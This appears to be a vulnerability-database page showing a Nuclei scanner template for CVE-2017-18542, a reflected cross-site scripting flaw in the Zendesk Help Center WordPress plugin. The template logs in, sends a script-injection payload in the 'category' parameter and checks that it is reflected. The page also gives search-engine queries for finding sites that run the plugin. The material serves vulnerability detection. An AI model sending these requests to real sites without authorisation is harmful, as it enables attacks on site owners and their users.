Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-18542
HistoryOct 05, 2023 - 6:36 p.m.

Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting

2023-10-0518:36:49
ProjectDiscovery
github.com
cve
wordpress
wp-plugin
bws-zendesk
wpscan
xss
authenticated
bestwebsoft
zendesk_help_center

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

60.5%

The zendesk-help-center plugin before 1.0.5 for WordPress has multiple XSS issues.
id: CVE-2017-18542

info:
  name: Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The zendesk-help-center plugin before 1.0.5 for WordPress has multiple XSS issues.
  reference:
    - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18542
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18542
    - https://wordpress.org/plugins/zendesk-help-center/#developers
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-18542
    cwe-id: CWE-79
    epss-score: 0.00221
    epss-percentile: 0.60119
    cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: bestwebsoft
    product: zendesk_help_center
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/zendesk-help-center/
    fofa-query: body=/wp-content/plugins/zendesk-help-center/
    publicwww-query: "/wp-content/plugins/zendesk-help-center/"
  tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
          - 'contains(body_3, "Zendesk Help Center by BestWebSoft")'
        condition: and
# digest: 490a00463044022064b6b4da3715e1cd54ebe4c590fe066f88e1afa074bf62596f6b2c4c093bb185022019b68f9bf0cec36c4c3befc1afdded4713daac91435a3ab8b873d0dc233fa992:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

60.5%

Related for NUCLEI:CVE-2017-18542